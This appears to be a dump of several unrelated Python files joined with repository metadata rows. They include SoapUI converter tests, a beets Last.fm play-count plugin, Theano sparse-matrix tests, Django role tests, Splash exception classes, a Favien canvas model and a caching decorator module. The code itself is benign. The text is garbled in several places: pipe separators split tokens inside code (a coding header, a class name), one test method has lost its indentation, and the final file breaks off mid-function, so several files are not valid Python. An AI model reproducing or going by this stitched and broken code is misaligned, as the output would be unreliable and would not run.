        self.assertEqual("/api/json", third_req["label"])
        self.assertIn("extract-jsonpath", third_req)
        self.assertIn("something", third_req["extract-jsonpath"])
        self.assertEqual("$.baz", third_req["extract-jsonpath"]["something"]["jsonpath"])
    def test_find_test_case(self):
        """Looking up a scenario by test-case name returns that scenario."""
        obj = SoapUIScriptConverter(ROOT_LOGGER)
        config = obj.convert_script(RESOURCES_DIR + "soapui/project.xml")
        scenarios = config["scenarios"]
        self.assertEqual(len(scenarios), 4)

        target_scenario = scenarios["TestSuite 1-index"]
        found_name, found_scenario = obj.find_soapui_test_case("index", scenarios)
        self.assertEqual(target_scenario, found_scenario)
    def test_find_test_case_empty(self):
        """With no test-case name given, a default scenario is returned."""
        obj = SoapUIScriptConverter(ROOT_LOGGER)
        self.sniff_log(obj.log)
        config = obj.convert_script(RESOURCES_DIR + "soapui/project.xml")
        scenarios = config["scenarios"]
        self.assertEqual(len(scenarios), 4)

        target_scenario = scenarios["BlazeDemo LoadTest"]
        found_name, found_scenario = obj.find_soapui_test_case(None, scenarios)
        self.assertEqual(target_scenario, found_scenario)
    def test_skip_if_no_requests(self):
        """Test cases producing no requests are skipped with a warning."""
        obj = SoapUIScriptConverter(ROOT_LOGGER)
        self.sniff_log(obj.log)
        obj.convert_script(RESOURCES_DIR + "soapui/project.xml")
        self.assertIn("No requests extracted for scenario TestSuite 1-EmptyTestCase, skipping it",
                      self.log_recorder.warn_buff.getvalue())
    def test_rest_service_name_as_base_address(self):
        """The REST service address is used as the base URL of every
        converted request."""
        obj = SoapUIScriptConverter(ROOT_LOGGER)
        config = obj.convert_script(RESOURCES_DIR + "soapui/youtube-sample.xml")
        scenarios = config["scenarios"]
        scenario = scenarios["TestSuite-TestCase"]
        self.assertEqual(len(scenario["requests"]), 5)
        for request in scenario["requests"]:
            self.assertTrue(request["url"].startswith("http://gdata.youtube.com/"))
    def test_project_suite_case_level_properties(self):
        """Project- and test-case-level properties are exposed as
        namespaced scenario variables."""
        obj = SoapUIScriptConverter(ROOT_LOGGER)
        config = obj.convert_script(RESOURCES_DIR + "soapui/flickr-sample.xml")
        scenarios = config["scenarios"]
        scenario = scenarios["TestSuite-TestCase"]
        self.assertEqual(len(scenario["variables"]), 2)
        self.assertIn("#Project#ApiKey", scenario["variables"])
        self.assertIn("#TestCase#temp", scenario["variables"])
    def test_rest_parameters(self):
        """REST request parameters are converted into the request body."""
        obj = SoapUIScriptConverter(ROOT_LOGGER)
        config = obj.convert_script(RESOURCES_DIR + "soapui/flickr-sample.xml")
        scenarios = config["scenarios"]
        scenario = scenarios["TestSuite-TestCase"]
        self.assertEqual(len(scenario["requests"]), 4)
        first = scenario["requests"][0]
        self.assertIn("body", first)
        self.assertEqual(len(first["body"]), 4)
        self.assertTrue(all(key in first["body"] for key in ["format", "method", "nojsoncallback", "api_key"]))
    def test_soap_conversion(self):
        """SOAP steps convert to POST requests with an XML body, both in
        the merged scenario and in the per-step split scenarios."""
        obj = SoapUIScriptConverter(ROOT_LOGGER)
        config = obj.convert_script(RESOURCES_DIR + "soapui/globalweather.xml")
        self.assertEqual(len(config["scenarios"]), 4)
        merged = config["scenarios"]["GWSOAPMerged-Test"]
        split1 = config["scenarios"]["GWSOAPSplit-GetCities"]
        split2 = config["scenarios"]["GWSOAPSplit-GetWeather"]

        self.assertEqual(len(merged["requests"]), 2)
        self.assertEqual(merged["requests"][0]["url"], "http://www.webservicex.com/globalweather.asmx")
        self.assertEqual(merged["requests"][0]["method"], "POST")
        self.assertEqual(merged["requests"][0]["headers"]["Content-Type"], "text/xml; charset=utf-8")
        self.assertIn("body", merged["requests"][0])
        self.assertEqual(merged["requests"][1]["url"], "http://www.webservicex.com/globalweather.asmx")

        self.assertEqual(len(split1["requests"]), 1)
        self.assertEqual(split1["requests"][0]["url"], "http://www.webservicex.com/globalweather.asmx")
        self.assertEqual(len(split2["requests"]), 1)
        self.assertEqual(split2["requests"][0]["url"], "http://www.webservicex.com/globalweather.asmx")
def test_rest_templated_params_interpolation(self):
obj = SoapUIScriptConverter(ROOT_LOGGER)
config = obj.convert_script(RESOURCES_DIR + "soapui/gmaps-sample.xml")
self.assertEqual(len(config["scenarios"]), 10)
scenario = config["scenarios"]["Directions API TestSuite-Simple Tests"]
for request in scenario["requests"]:
self.assertNotIn("{format}", request["url"])
self.assertEqual(scenario["requests"][0]["url"], "http://maps.googleapis.com/maps/api/directions/json")
self.assertEqual(scenario["requests"][1]["url"], "http://maps.googleapis.com/maps/api/directions/json")
self.assertEqual(scenario["requests"][2]["url"], "http://maps.googleapis.com/maps/api/directions/xml")
|
kareemallen/beets | beetsplug/lastimport.py | Python | mit | 6,738 | 0 | # -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2015, Rafael Bodill http://github.com/rafi
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import (division, absolute_import, print_function,
unicode_literals)
import requests
from beets import ui
from beets import dbcore
from beets import config
from beets import plugins
from beets.dbcore import types
API_URL = 'http://ws.audioscrobbler.com/2.0/'
class LastImportPlugin(plugins.BeetsPlugin):
    """Beets plugin providing the ``lastimport`` command, which imports
    per-track play counts from a Last.fm account into the library."""

    def __init__(self):
        super(LastImportPlugin, self).__init__()
        config['lastfm'].add({
            'user': '',
            'api_key': '',
        })
        # Keep the API key out of plain-text config dumps.
        config['lastfm']['api_key'].redact = True
        self.config.add({
            'per_page': 500,
            'retry_limit': 3,
        })
        # Expose play_count as an integer flexible field on items.
        self.item_types = {
            'play_count': types.INTEGER,
        }

    def commands(self):
        """Register the ``lastimport`` CLI subcommand."""
        cmd = ui.Subcommand('lastimport', help='import last.fm play-count')

        def func(lib, opts, args):
            import_lastfm(lib, self._log)

        cmd.func = func
        return [cmd]
def import_lastfm(lib, log):
    """Import Last.fm play counts into the beets library.

    Pages through the configured user's Last.fm library, matching each
    returned track against items in ``lib`` and storing play counts on
    the matches. Failed page fetches are retried up to the configured
    ``retry_limit``.

    :param lib: beets library to update.
    :param log: logger used for progress and error reporting.
    :raises ui.UserError: if no Last.fm user is configured or the API
        reports no data.
    """
    user = config['lastfm']['user'].get(unicode)
    per_page = config['lastimport']['per_page'].get(int)

    if not user:
        raise ui.UserError('You must specify a user name for lastimport')

    log.info('Fetching last.fm library for @{0}', user)

    page_total = 1
    page_current = 0
    found_total = 0
    unknown_total = 0
    retry_limit = config['lastimport']['retry_limit'].get(int)
    # Iterate through a yet to be known page total count
    while page_current < page_total:
        log.info('Querying page #{0}{1}...',
                 page_current + 1,
                 '/{}'.format(page_total) if page_total > 1 else '')

        for retry in range(0, retry_limit):
            page = fetch_tracks(user, page_current + 1, per_page)
            if 'tracks' in page:
                # Let us the reveal the holy total pages!
                page_total = int(page['tracks']['@attr']['totalPages'])
                if page_total < 1:
                    # It means nothing to us!
                    raise ui.UserError('Last.fm reported no data.')

                track = page['tracks']['track']
                found, unknown = process_tracks(lib, track, log)
                found_total += found
                unknown_total += unknown
                break
            else:
                log.error('ERROR: unable to read page #{0}',
                          page_current + 1)
                log.debug('API response: {}', page)
                # BUG FIX: the last loop pass is attempt `retry_limit`
                # (retry == retry_limit - 1), so the failure branch was
                # unreachable with the previous `retry < retry_limit`.
                if retry < retry_limit - 1:
                    log.info(
                        'Retrying page #{0}... ({1}/{2} retry)',
                        page_current + 1, retry + 1, retry_limit
                    )
                else:
                    # BUG FIX: the message was split into two arguments,
                    # so "tried {1} times" was consumed as the {0} value;
                    # also use the 1-based page number like the other logs.
                    log.error('FAIL: unable to fetch page #{0}, '
                              'tried {1} times', page_current + 1, retry + 1)
        page_current += 1

    log.info('... done!')
    log.info('finished processing {0} song pages', page_total)
    log.info('{0} unknown play-counts', unknown_total)
    log.info('{0} play-counts imported', found_total)
def fetch_tracks(user, page, limit):
    """Fetch one page of ``user``'s Last.fm library via the
    ``library.gettracks`` API and return the decoded JSON as a dict.

    :param user: Last.fm user name.
    :param page: 1-based page number to request.
    :param limit: number of tracks per page.
    """
    return requests.get(API_URL, params={
        'method': 'library.gettracks',
        'user': user,
        'api_key': plugins.LASTFM_KEY,
        'page': bytes(page),
        'limit': bytes(limit),
        'format': 'json',
    }).json()
def process_tracks(lib, tracks, log):
    """Match Last.fm ``tracks`` against items in ``lib`` and store
    their play counts.

    Matching tries, in order: MusicBrainz track id, then
    artist/title/album substrings, then artist/title, then artist/title
    with the ASCII apostrophe replaced by a typographic one.

    :param lib: beets library to query and update.
    :param tracks: list of track dicts from the Last.fm API.
    :param log: logger for progress output.
    :return: ``(found, failed)`` counts for this page.
    """
    total = len(tracks)
    total_found = 0
    total_fails = 0
    log.info('Received {0} tracks in this page, processing...', total)

    for num in xrange(0, total):
        song = ''
        trackid = tracks[num]['mbid'].strip()
        artist = tracks[num]['artist'].get('name', '').strip()
        title = tracks[num]['name'].strip()
        album = ''
        if 'album' in tracks[num]:
            album = tracks[num]['album'].get('name', '').strip()

        log.debug(u'query: {0} - {1} ({2})', artist, title, album)

        # First try to query by musicbrainz's trackid
        if trackid:
            song = lib.items(
                dbcore.query.MatchQuery('mb_trackid', trackid)
            ).get()

        # Otherwise try artist/title/album
        if not song:
            log.debug(u'no match for mb_trackid {0}, trying by '
                      u'artist/title/album', trackid)
            query = dbcore.AndQuery([
                dbcore.query.SubstringQuery('artist', artist),
                dbcore.query.SubstringQuery('title', title),
                dbcore.query.SubstringQuery('album', album)
            ])
            song = lib.items(query).get()

        # If not, try just artist/title
        if not song:
            log.debug(u'no album match, trying by artist/title')
            query = dbcore.AndQuery([
                dbcore.query.SubstringQuery('artist', artist),
                dbcore.query.SubstringQuery('title', title)
            ])
            song = lib.items(query).get()

        # Last resort, try just replacing to utf-8 quote
        if not song:
            title = title.replace("'", u'\u2019')
            log.debug(u'no title match, trying utf-8 single quote')
            query = dbcore.AndQuery([
                dbcore.query.SubstringQuery('artist', artist),
                dbcore.query.SubstringQuery('title', title)
            ])
            song = lib.items(query).get()

        if song:
            # Overwrite the stored count with Last.fm's value.
            count = int(song.get('play_count', 0))
            new_count = int(tracks[num]['playcount'])
            log.debug(u'match: {0} - {1} ({2}) '
                      u'updating: play_count {3} => {4}',
                      song.artist, song.title, song.album, count, new_count)
            song['play_count'] = new_count
            song.store()
            total_found += 1
        else:
            total_fails += 1
            log.info(u' - No match: {0} - {1} ({2})',
                     artist, title, album)

    if total_fails > 0:
        log.info('Acquired {0}/{1} play-counts ({2} unknown)',
                 total_found, total, total_fails)

    return total_found, total_fails
|
JazzeYoung/VeryDeepAutoEncoder | theano/sparse/tests/test_basic.py | Python | bsd-3-clause | 119,627 | 0.000594 | from __future__ import absolute_import, print_function, division
from itertools import product
import time
import unittest
from nose.plugins.skip import SkipTest
import numpy
from six.moves import xrange
try:
import scipy.sparse as sp
import scipy.sparse
from scipy.sparse import csr_matrix
except ImportError:
pass # The variable enable_sparse will be used to disable the test file.
import theano
from theano import tensor
from theano import sparse
from theano import compile, config, gof
from theano.sparse import enable_sparse
from theano.tensor.basic import _allclose
from theano.tests.unittest_tools import attr
if not enable_sparse:
raise SkipTest('Optional package SciPy not installed')
from theano.sparse.basic import _is_dense, _is_sparse, _mtypes
from theano.sparse.basic import _is_dense_variable, _is_sparse_variable
from theano.sparse import (
verify_grad_sparse, as_sparse_variable,
CSC, CSM, CSMProperties, csm_properties,
SparseType, CSMGrad,
StructuredDot,
StructuredDotGradCSC, StructuredDotGradCSR,
AddSS, AddSD, MulSS, MulSD, Transpose, Neg, Remove0,
add, mul, structured_dot, transpose,
csc_from_dense, csr_from_dense, dense_from_sparse,
Dot, Usmm, sp_ones_like, GetItemScalar, GetItemList, GetItem2Lists,
SparseFromDense,
Cast, cast, HStack, VStack, AddSSData, add_s_s_data,
structured_minimum, structured_maximum, structured_add,
mul_s_v, structured_add_s_v,
SamplingDot, sampling_dot,
Diag, diag, SquareDiagonal, square_diagonal,
EnsureSortedIndices, ensure_sorted_indices, clean,
ConstructSparseFromList, construct_sparse_from_list,
TrueDot, true_dot, eq, neq, le, ge, gt, lt)
# Probability distributions are currently tested in test_sp2.py
# from theano.sparse import (
# Poisson, poisson, Binomial, Multinomial, multinomial)
from theano.sparse.opt import (StructuredDotCSC, UsmmCscDense, CSMGradC)
from theano.tests import unittest_tools as utt
def as_sparse_format(data, format):
    """Convert `data` to the requested scipy sparse `format`.

    Only 'csc' and 'csr' are supported; anything else raises
    NotImplementedError.
    """
    if format == 'csr':
        return scipy.sparse.csr_matrix(data)
    if format == 'csc':
        return scipy.sparse.csc_matrix(data)
    raise NotImplementedError()
def eval_outputs(outputs):
    # Compile a no-input theano function for `outputs` and return the
    # value of the first output.
    return compile.function([], outputs)()[0]
# scipy 0.17 will return sparse values in all cases while previous
# version sometimes wouldn't. This will make everything dense so that
# we can use assert_allclose.
def as_ndarray(val):
    """Densify `val` when it is a sparse matrix (exposes ``toarray``);
    return it unchanged otherwise.

    scipy 0.17 returns sparse values in all cases while previous
    versions sometimes wouldn't, so densifying lets callers use
    assert_allclose uniformly.
    """
    try:
        densify = val.toarray
    except AttributeError:
        return val
    return densify()
def random_lil(shape, dtype, nnz):
    """Return a `shape`-d scipy ``lil_matrix`` of `dtype` with random
    nonzero entries.

    :param shape: 2-tuple (rows, cols).
    :param dtype: numpy dtype string for the stored values.
    :param nnz: number of random insertions attempted; index collisions
        (or an integer value rounding to 0) can leave fewer stored
        entries.
    """
    rval = sp.lil_matrix(shape, dtype=dtype)
    huge = 2 ** 30
    for k in range(nnz):
        # set non-zeros in random locations (row x, col y)
        # BUG FIX: numpy.random.random_integers is deprecated (and
        # removed in modern numpy); randint(1, huge + 1) draws from the
        # same inclusive range [1, huge].
        idx = numpy.random.randint(1, huge + 1, size=2) % shape
        value = numpy.random.rand()
        # if dtype *int*, value will always be zeros!
        if "int" in dtype:
            value = int(value * 100)
        # The call to tuple is needed as scipy 0.13.1 do not support
        # ndarray with lenght 2 as idx tuple.
        rval.__setitem__(
            tuple(idx),
            value)
    return rval
def sparse_random_inputs(format, shape, n=1, out_dtype=None, p=0.5, gap=None,
                         explicit_zero=False, unsorted_indices=False):
    """Return a tuple containing everything needed to
    perform a test.

    If `out_dtype` is `None`, theano.config.floatX is
    used.

    :param format: Sparse format.
    :param shape: Shape of data.
    :param n: Number of variable.
    :param out_dtype: dtype of output.
    :param p: Sparsity proportion.
    :param gap: Tuple for the range of the random sample. When
                length is 1, it is assumed to be the exclusive
                max, when `gap` = (`a`, `b`) it provide a sample
                from [a, b[. If `None` is used, it provide [0, 1]
                for float dtypes and [0, 50[ for integer dtypes.
    :param explicit_zero: When True, we add explicit zero in the
                          returned sparse matrix
    :param unsorted_indices: when True, we make sure there is
                             unsorted indices in the returned
                             sparse matrix.
    :return: (variable, data) where both `variable`
             and `data` are list.

    :note: explicit_zero and unsorted_indices was added in Theano 0.6rc4
    """
    if out_dtype is None:
        out_dtype = theano.config.floatX

    assert 0 <= p <= 1
    assert len(shape) == 2
    assert out_dtype in sparse.all_dtypes
    assert gap is None or isinstance(gap, (tuple, list))
    # Unsigned dtypes cannot represent a negative lower bound.
    if gap is not None and out_dtype.startswith('u'):
        assert gap[0] >= 0

    def _rand():
        # Bernoulli mask selects which cells are nonzero (density p).
        where = numpy.random.binomial(1, p, size=shape).astype('int8')

        if out_dtype in sparse.discrete_dtypes:
            if not gap:
                value = numpy.random.randint(50, size=shape)
            elif len(gap) == 2:
                value = numpy.random.randint(gap[0], gap[1], size=shape)
            else:
                value = numpy.random.randint(gap[0], size=shape)
        else:
            if not gap:
                value = numpy.random.random(shape)
            elif len(gap) == 2:
                a, b = gap
                value = a + numpy.random.random(shape) * (b - a)
            else:
                value = numpy.random.random(shape) * gap[0]
        return (where * value).astype(out_dtype)

    variable = [getattr(theano.sparse, format + '_matrix')(dtype=out_dtype)
                for k in range(n)]
    data = [getattr(scipy.sparse, format + '_matrix')(_rand(), dtype=out_dtype)
            for k in range(n)]
    if unsorted_indices:
        for idx in range(n):
            d = data[idx]
            # Fancy row indexing leaves the indices unsorted.
            d = d[list(range(d.shape[0]))]
            assert not d.has_sorted_indices
            data[idx] = d
    if explicit_zero:
        for idx in range(n):
            assert data[idx].nnz > 1, (
                "can't make a sparse matrix with explicit 0")
            # Overwrite one stored value with an explicit zero entry.
            d_idx = numpy.random.randint(data[idx].nnz)
            data[idx].data[d_idx] = 0

    # numpy 1.5.0 with scipy 0.9.0 have scipy.sparse.XXX_matrix return
    # typenum 10(ulonglong) instead of 8(uint64) event if they are the same!
    # Theano don't like ulonglong type_num
    dtype = numpy.dtype(out_dtype)  # Convert into dtype object.
    if data[0].dtype.num != dtype.num and dtype.str == data[0].dtype.str:
        data[0].data = theano._asarray(data[0].data, out_dtype)
    assert data[0].dtype.num == dtype.num
    return (variable, data)
class T_verify_grad_sparse(unittest.TestCase):
    class FailOp(gof.op.Op):
        """Op with a deliberately wrong gradient: perform() computes -x
        but grad() returns gz (or its structured variant) unchanged, so
        verify_grad_sparse is expected to flag it."""

        def __init__(self, structured):
            # Selects the structured-gradient variant in grad().
            self.structured = structured

        def __eq__(self, other):
            return (type(self) == type(other)) and \
                self.structured == other.structured

        def __hash__(self):
            return hash(type(self)) ^ hash(self.structured)

        def make_node(self, x):
            x = as_sparse_variable(x)
            return gof.Apply(self, [x], [x.type()])

        def perform(self, node, inputs, outputs):
            (x,) = inputs
            (out,) = outputs
            assert _is_sparse(x)
            # Output is the negation of the input.
            out[0] = -x

        def grad(self, inputs, gout):
            (x,) = inputs
            (gz,) = gout
            assert _is_sparse_variable(x) and _is_sparse_variable(gz)
            # Intentionally missing the negation, making the gradient wrong.
            if self.structured:
                return sp_ones_like(x) * dense_from_sparse(gz),
            else:
                return gz,

        def infer_shape(self, node, shapes):
            # Output shape equals input shape.
            return [shapes[0]]
def test_grad_fail(self):
self.assertRaises(verify_grad_sparse.E_grad,
verify_grad_sparse,
self.FailOp(structured=False),
[sp.csr_matrix(random_lil((10, 40),
config.floatX, 3))])
self.assertRaises(verify_grad_sparse.E_grad,
verify_grad_sparse,
self.FailOp(structured=True),
[sp.csr_matrix(random_lil((10, 40),
|
mitodl/lore | roles/tests/test_utils.py | Python | agpl-3.0 | 2,672 | 0 | """
Test the roles utils
"""
from __future__ import unicode_literals
from django.contrib.auth.models import Group
from django.core.management import call_command
from django.utils.text import slugify
from guardian.shortcuts import get_perms
from mock import patch
from learningresources.api import create_repo
from learningresources.tests.base import LoreTestCase
from roles.permissions import RepoPermission, GroupTypes
from roles import utils
class TestRoleUtils(LoreTestCase):
    """
    Tests for the roles utils: group-permission syncing for repos.
    """
    def __init__(self, *args, **kwargs):
        super(TestRoleUtils, self).__init__(*args, **kwargs)
        # Fixture repo and the per-role group names derived from its slug.
        self.repo_name = 'my little+test repo'
        self.repo_desc = 'test description'
        self.repo_slug = slugify(self.repo_name)
        self.group_admin = GroupTypes.REPO_ADMINISTRATOR.format(self.repo_slug)
        self.group_curator = GroupTypes.REPO_CURATOR.format(self.repo_slug)
        self.group_author = GroupTypes.REPO_AUTHOR.format(self.repo_slug)

    def check_group_permission(self, repo, group, expected_permissions):
        """
        Assert that `group` has exactly `expected_permissions` on `repo`.
        """
        self.assertListEqual(
            sorted(get_perms(group, repo)),
            sorted(expected_permissions)
        )

    def test_sync_permissions(self):
        """
        sync_groups_permissions restores wiped group permissions.
        """
        repo = create_repo(self.repo_name, self.repo_desc, self.user.id)
        # Get default permissions before wiping.
        admin = Group.objects.get(name=self.group_admin)
        self.check_group_permission(
            repo,
            admin,
            RepoPermission.administrator_permissions()
        )
        # Patching roles_init_new_repo makes the sync wipe without
        # re-creating, leaving the group with no permissions.
        with patch.object(utils, 'roles_init_new_repo') as mock_method:
            mock_method.return_value = None
            utils.sync_groups_permissions()
        # Get default permissions after wiping.
        self.check_group_permission(
            repo,
            admin,
            []
        )
        # Restore permissions the first call of sync_groups_permissions
        # will not do anything because the permissions have been already wiped.
        utils.sync_groups_permissions()
        self.check_group_permission(
            repo,
            admin,
            RepoPermission.administrator_permissions()
        )

    # pylint: disable=no-self-use
    def test_sync_permissions_command(self):
        """
        The manage.py sync_permissions command delegates to
        utils.sync_groups_permissions.
        """
        with patch.object(utils, 'sync_groups_permissions') as mock_method:
            mock_method.return_value = None
            call_command('sync_permissions')
        mock_method.assert_called_with()
|
Youwotma/splash | splash/exceptions.py | Python | bsd-3-clause | 1,502 | 0.000666 | # -*- coding: | utf-8 -*-
from __future__ import absolute_import
class BadOption(Exception):
    """Raised when incorrect HTTP API arguments are supplied."""
class RenderError(Exception):
    """Raised when an error occurs while rendering a page."""
class InternalError(Exception):
    """Raised for unhandled internal errors."""
class GlobalTimeoutError(Exception):
    """Raised when the timeout is exceeded while rendering a page."""
class U | nsupportedContentType(Exception):
""" Request Content-Type is not supported """
pass
class ExpiredArguments(Exception):
    """Raised when arguments stored with ``save_args`` have expired."""
class ScriptError(BadOption):
    """Error happened while executing Lua script.

    The class attributes below are error-type codes identifying at
    which stage of script handling the failure occurred.
    """
    LUA_INIT_ERROR = 'LUA_INIT_ERROR'  # error happened before coroutine starts
    LUA_ERROR = 'LUA_ERROR'  # lua error() is called from the coroutine
    LUA_CONVERT_ERROR = 'LUA_CONVERT_ERROR'  # result can't be converted to Python
    SPLASH_LUA_ERROR = 'SPLASH_LUA_ERROR'  # custom error raised by Splash
    BAD_MAIN_ERROR = 'BAD_MAIN_ERROR'  # main() definition is incorrect
    MAIN_NOT_FOUND_ERROR = 'MAIN_NOT_FOUND_ERROR'  # main() is not found
    SYNTAX_ERROR = 'SYNTAX_ERROR'  # XXX: unused; reported as INIT_ERROR now
    JS_ERROR = 'JS_ERROR'  # error in a wrapped JS function
    UNKNOWN_ERROR = 'UNKNOWN_ERROR'
class JsError(Exception):
    """Raised when an error occurred in JavaScript code."""
class OneShotCallbackError(Exception):
    """Raised when a one-shot callback is invoked more than once."""
|
favien/favien | favien/canvas.py | Python | agpl-3.0 | 3,524 | 0.001419 | """:mod:`favien.canvas` --- Canvas
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import boto3
from botocore.client import Config
from flask import current_app
from sqlalchemy.orm import deferred, dynamic_loader, relationship
from sqlalchemy.schema import Column, ForeignKey
from sqlalchemy.sql.functions import now
from sqlalchemy.types import Boolean, DateTime, Integer, UnicodeText
from sqlalchemy.dialects.postgres import JSONB
from .orm import Base
from .user import User
class Canvas(Base):
    """The canvas work.

    The stroke data itself is stored as an object in S3 under
    :attr:`key`; this row holds metadata and the JSON stroke list.
    """

    #: (:class:`sqlalchemy.types.Integer`) The primary key integer.
    id = Column(Integer, primary_key=True)

    #: (:class:`sqlalchemy.types.Integer`) Canvas artist.
    artist_id = Column(Integer, ForeignKey(User.id), nullable=False)

    #: (:class:`sqlalchemy.orm.relationship`) Canvas artist.
    artist = relationship(User)

    #: (:class:`sqlalchemy.orm.relationship`) Canvas collaborators.
    collaborators = relationship(User, secondary='collaborations')

    #: (:class:`sqlalchemy.orm.dynamic_loader`) Canvas collaborations.
    collaborations = dynamic_loader('Collaboration', cascade='all, delete-orphan')

    #: (:class:`sqlalchemy.types.String`) Canvas title.
    title = Column(UnicodeText)

    #: (:class:`sqlalchemy.types.UnicodeText`) The description of the canvas.
    description = Column(UnicodeText)

    #: (:class:`sqlalchemy.dialects.postgres.JSON`) Canvas brush strokes.
    strokes = deferred(Column(JSONB))

    #: (:class:`sqlalchemy.types.Integer`) Canvas width in pixels.
    width = Column(Integer, nullable=False)

    #: (:class:`sqlalchemy.types.Integer`) Canvas height in pixels.
    height = Column(Integer, nullable=False)

    #: (:class:`sqlalchemy.types.Boolean`) Is this canvas broadcasting?
    broadcast = Column(Boolean, nullable=False)

    #: (:class:`sqlalchemy.types.Boolean`) Is replaying allowed?
    replay = Column(Boolean, nullable=False)

    #: (:class:`sqlalchemy.types.DateTime`) The created time.
    created_at = deferred(
        Column(DateTime(timezone=True), nullable=False, default=now()),
        group='metadata'
    )

    __tablename__ = 'canvases'

    @property
    def key(self):
        """S3 object key for this canvas: ``'<table>/<id>'``."""
        return '{}/{}'.format(self.__tablename__, self.id)

    def from_blob(self, blob):
        """Upload ``blob`` as this canvas's S3 object and return the
        ``put`` response."""
        s3 = boto3.resource('s3')
        o = s3.Object(current_app.config['AWS_S3_BUCKET'], self.key)
        return o.put(Body=blob)

    def get_url(self):
        """Return a presigned S3 GET URL for this canvas's object."""
        s3 = boto3.client('s3', config=Config(signature_version='s3v4'))
        return s3.generate_presigned_url(
            ClientMethod='get_object',
            Params={
                'Bucket': current_app.config['AWS_S3_BUCKET'],
                'Key': self.key,
            },
        )
class Collaboration(Base):
    """:class:`User`\ s collaborate on :class:`Canvas`\ s.

    Association row with a composite primary key of
    (:attr:`canvas_id`, :attr:`artist_id`).
    """

    #: (:class:`sqlalchemy.types.Integer`) :attr:`~Canvas.id` of :attr:`canvas`.
    canvas_id = Column(Integer, ForeignKey(Canvas.id), primary_key=True)

    #: (:class:`sqlalchemy.types.Integer`) :attr:`~User.id` of :attr:`artist`.
    artist_id = Column(Integer, ForeignKey(User.id), primary_key=True)

    #: (:class:`sqlalchemy.orm.relationship`) Canvas the user is collaborating on.
    canvas = relationship(Canvas)

    #: (:class:`sqlalchemy.orm.relationship`) Collaborating artist.
    artist = relationship(User)

    #: (:class:`sqlalchemy.types.DateTime`) The created time.
    created_at = Column(DateTime(timezone=True), nullable=False, default=now())

    __tablename__ = 'collaborations'
|
trb/Multicache | cache.py | Python | bsd-2-clause | 5,341 | 0.001311 | from types import FunctionType
import backends
__storage = backends.default()
def set_storage(BackendInstance):
    # Replace the module-wide cache backend shared by all cached callables.
    global __storage
    __storage = BackendInstance
def make_cached(make_key, f):
    """Return a wrapper around `f` that consults the module storage
    backend before calling through.

    `make_key` is called as ``make_key(args=..., kwargs=...)`` to
    derive the storage key for each invocation.
    """
    def cached(*args, **kwargs):
        key = make_key(args=args, kwargs=kwargs)
        if __storage.has(key):
            return __storage.get(key)
        result = f(*args, **kwargs)
        __storage.set(key, result)
        return result
    return cached
def cache_function(function_or_key):
    """Decorator caching a function's results in the module backend.

    Used bare (``@cache_function``) the cache key is derived from the
    function name plus the call's positional and keyword arguments.
    Called with a string (``@cache_function('mykey')``) every call shares
    one fixed key, qualified by the decorated function's name.
    """
    key = 'function:'
    if type(function_or_key) is FunctionType:
        # Bare decorator: the single argument is the function to wrap.
        f = function_or_key
        key = key + f.__name__

        def make_key(args=None, kwargs=None):
            # Bug fix: 'key' already ends with f.__name__, so appending
            # f.__name__ again (as the original did) doubled the name in
            # every generated cache key.
            return key + str(args) + str(kwargs)
        return make_cached(make_key, f)
    else:
        # Decorator called with arguments: the user supplied a fixed key
        # overriding automatic per-call key creation.
        key += function_or_key

        def make_decorator(f):
            def make_key(args=None, kwargs=None):
                return key + ':' + f.__name__
            return make_cached(make_key, f)
        return make_decorator
# Pending (id, instance, provider) registrations awaiting __do_queue().
__register = []
# True while __register holds entries not yet flushed.
__open_queue = False
# NOTE(review): the module-level __in_init and __cache names appear unused
# (instances carry their own '__in_init'/'__cached__' entries) -- confirm.
__in_init = False
__cache = {}
# Provider function captured by @cache_provider for the next @cache_class.
__next_provider = None
# Queued (id, values) cache writes, flushed by do_updates().
__update = []
def __register_update(id_, values):
    """Queue a (id_, values) pair to be written to the backend by do_updates()."""
    __update.append((id_, values))
def do_updates():
    """Write every queued (id, values) pair to the backend, then clear the queue."""
    global __update
    for entry_id, entry_values in __update:
        __storage.set(entry_id, entry_values)
    __update = []
def __do_queue():
    """Flush pending registrations: seed the backend and attach instance caches."""
    global __register
    global __cache
    global __open_queue
    # Close the queue first so re-entrant attribute access doesn't re-flush.
    __open_queue = False
    for id_, self, provider in __register:
        # Only invoke the (potentially expensive) provider on a cache miss.
        if not __storage.has(id_):
            __storage.set(id_, provider(self))
        self.__cached__ = __storage.get(id_)
    __register = []
def __register_class(id_, self, provider):
    """Queue an instance for lazy cache attachment and open the queue."""
    global __open_queue
    __register.append((id_, self, provider))
    __open_queue = True
def __make_id(cls, self, id_attribute):
    """Build the backend key 'class:<ClassName><id-value>' for an instance."""
    identifier = self.__dict__[id_attribute]
    return 'class:%s%s' % (cls.__name__, identifier)
def __should_do_queue(self):
    """True when the queue is open and *self* has finished running __init__.

    An instance that never recorded '__in_init' (or is still inside its
    __init__) must not trigger a queue flush.
    """
    # Missing key defaults to True, i.e. "treat as still initialising".
    still_initialising = self.__dict__.get('__in_init', True)
    return bool(__open_queue and not still_initialising)
def cache_class(id_attribute):
    """Cachable attributes don't have to be specified since
    self.__cached__.keys() will provide all attributes that were
    retrieved from cache (and could subsequently be updated).
    """
    # Class-decorator factory: wraps __init__/__getattribute__/__setattr__
    # so instances are lazily hydrated from the cache backend, keyed on the
    # instance attribute named by id_attribute.
    def make_class(cls):
        global __next_provider
        # @cache_provider must have run immediately before this decorator.
        if __next_provider is None:
            raise LookupError("No provider function declared. Put"
                + " the 'cache_provider' decorator on the"
                + " function that returns data for the"
                + " instance")
        provider_function = __next_provider
        __next_provider = None
        old_init = cls.__init__
        def new_init(self, *args, **kwargs):
            # '__in_init' suppresses queue flushing while the real
            # __init__ runs (see __should_do_queue).
            self.__in_init = True
            old_init(self, *args, **kwargs)
            self.__in_init = False
            __register_class(__make_id(cls, self, id_attribute),
                             self, provider_function)
        cls.__init__ = new_init
        old_getattribute = cls.__getattribute__
        def new_getattribute(self, key):
            if key != '__dict__' and key != '__cached__':
                if __should_do_queue(self):
                    __do_queue()
